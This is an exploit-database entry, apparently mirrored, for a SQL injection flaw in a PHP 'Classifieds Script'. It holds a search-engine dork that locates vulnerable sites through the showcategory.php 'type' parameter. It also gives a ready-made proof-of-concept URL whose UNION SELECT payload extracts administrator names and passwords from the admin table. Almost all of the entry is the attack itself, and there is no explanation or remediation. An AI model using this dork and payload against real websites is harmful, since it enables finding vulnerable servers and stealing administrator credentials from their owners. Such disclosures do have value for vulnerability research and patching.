[] NeoSense
E X P L O I T S
title author type platform port cve id

Classifieds Script - 'type' SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2009-12-29 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
Classifieds Script (type) Remote SQL Injection Vulnerability

|    Author: Hussin X
|
|    Home :  www.iq-ty.com<http://www.iq-ty.com>
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
| d0rk : inurl:"showcategory.php?type"


POC :

http://[server]/showcategory.php?type=6&cid=-1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+freetplbanners_admin--


#end

IQ-SecuritY FoRuM
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.